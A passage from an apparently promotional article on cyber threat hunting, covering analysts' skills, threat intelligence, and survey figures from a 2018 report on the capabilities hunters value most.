Highly skilled, dedicated personnel. Threat hunters, or cybersecurity threat analysts, are a breed of their own. These experts not only know how to use the security technology mentioned, but they also combine a relentless aspiration to go on the offensive with intuitive problem-solving and forensic capabilities to uncover and mitigate hidden threats.

Threat intelligence. Having access to evidence-based global intelligence from experts around the world further enhances and expedites the hunt for already existing IOCs. Hunters are aided by information such as attack classifications for malware and threat group identification, as well as advanced threat indicators that help zero in on malicious IOCs.

Research from the 2018 Threat Hunting Report from Crowd Research Partners confirms the importance of these threat-hunting capabilities. When respondents were asked to rank the most important capability, the survey found:

69% chose threat intelligence
57% chose behavior analytics
56% chose automatic detection
54% chose machine learning and automated analytics

Threat hunters look for attackers that get in under the radar, through vulnerabilities a company may not even know exist. These attackers spend considerable amounts of time planning and performing reconnaissance, only acting when they know they can penetrate the network without notice. They also plant and build malware that has yet to be recognized, or use techniques that don't rely on malware at all, to set themselves up with a persistent base from which to attack.

A Profile of a Prolific Threat Hunter

So what does it take to outsmart even the smartest attackers?

Cyber threat hunters are relentless and able to find even the most minute trace of what cyber attackers leave behind.

Threat hunters use their highly tuned skills to zero in on the slight changes that occur as the attackers make their moves inside a system or file.

The best threat hunters rely on their instincts to sniff out the most nefarious attacker's stealth moves.
